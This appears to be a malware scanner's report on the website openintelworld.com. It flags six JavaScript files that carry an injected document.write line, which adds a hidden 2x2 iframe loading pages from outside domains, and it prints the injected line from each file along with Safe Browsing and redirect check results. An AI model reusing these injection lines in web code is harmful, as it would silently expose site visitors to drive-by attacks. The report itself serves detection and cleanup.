Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=openintelworld.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://openintelworld.com/ | 200 OK Content-Length: 50925 Content-Type: text/html | clean |
http://openintelworld.com/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94032 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).doc ...[3643 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3364205 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205> | ||
http://openintelworld.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://openintelworld.com/js/jquery.parallax-1.1.js | 200 OK Content-Length: 2498 Content-Type: application/javascript | clean |
http://openintelworld.com/js/parallax-config.js | 200 OK Content-Length: 3129 Content-Type: application/javascript | clean |
http://openintelworld.com/js/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15791 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide( easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/jquery.form.js | 200 OK Content-Length: 28560 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } this.selected = select; } }); }; $.fn.ajaxSubmit.debug = false; function log() { if (!$.fn.ajaxSubmit.debug) return; var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/cufon-yui.js | 200 OK Content-Length: 18425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addE Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/Tekton_Pro_700.font.js | 200 OK Content-Length: 27444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
Cufon.registerFont({"w":186,"face":{"font-family":"Tekton Pro","font-weight":700,"font-stretch":"condensed","units-per-em":"360","panose-1":"2 15 6 6 2 2 8 2 9 4","ascent":"245","descent":"-115","x-height":"7","cap-height":"2","bbox":"-33 -270.463 222 105.318","underline-thickness":"18","underline-position":"-18 Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/custom.js | 200 OK Content-Length: 2430 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: interjeroidejos.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe>');
Cufon.replace('h1, h2, h3, h4, h5, h6, .button small', { fontFamily: 'HelveticaNeue Regular', hover: true }); Cufon.replace('h1 strong, h2 strong, h3 strong, h4 strong, h5 strong, h6 strong, .btn', { fontFamily: 'HelveticaNeue Bold', hover: true }); function goToByScroll(id){ $('html,body').animate({scrollTop: $("#"+id).offset().top},1700, 'easeInOutExpo'); } $(d ...[1565 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe> Malicious iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3364205 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205> | ||
http://openintelworld.com/js/chrome.js | 200 OK Content-Length: 8752 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/ | 200 OK Content-Length: 20638 Content-Type: text/html | clean |
http://openintelworld.com/blog/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/wp-content/themes/airlock/advance/plugins/flickrpress/flickr.js?ver=3.3.1 | 200 OK Content-Length: 1950 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/wp-content/themes/airlock/common/js/jquery-ui.min.js?ver=1.8.12 | 200 OK Content-Length: 199940 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: openintelworld.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 17:56:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: openintelworld.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 17:56:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: openintelworld.com
Referer: http://www.google.com/search?q=openintelworld.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: openintelworld.com
Referer: http://www.google.com/search?q=openintelworld.com
Result:
The result is similar to the first query. There are no suspicious redirects found.